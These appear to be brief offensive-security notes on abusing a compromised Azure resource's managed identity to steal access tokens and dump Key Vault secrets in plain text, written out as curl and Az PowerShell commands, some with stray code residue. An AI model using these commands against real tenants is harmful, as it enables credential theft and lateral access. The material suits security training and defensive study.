Key Vault

If we can compromise an azure resource whose managed identity can read secrets from a key vault (due to an access policy or assigned one of the capable roles or a custom role), it may be possible to gain access to more resources.

Object types available with a key vault:

– Cryptographic Keys

- RSA, EC etc.

– Secrets

- Passwords, connection strings

– Certificates - Life cycle management

– Storage account keys - Key vault can manage and rotate access keys for storage accounts

Objects in a key vault are identified using Object Identifier URL.

https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}

– vault-name is the globally unique name of the key vault

– object-type can be "keys", "secrets" or "certificates"

– object-name is unique name of the object within the key vault

– object version is system generated and optionally used to address a unique version of an object.

Get-AzKeyVault

curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()

curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read()

$token = 'eyJ0..'
$keyvaulttoken = 'eyJ0..'
Connect-AzAccount -AccessToken $token -AccountId 2e91a4fe-a0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken

Get-AzKeyVault

Get-AzKeyVaultSecret -VaultName ResearchKeyVault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader –AsPlainText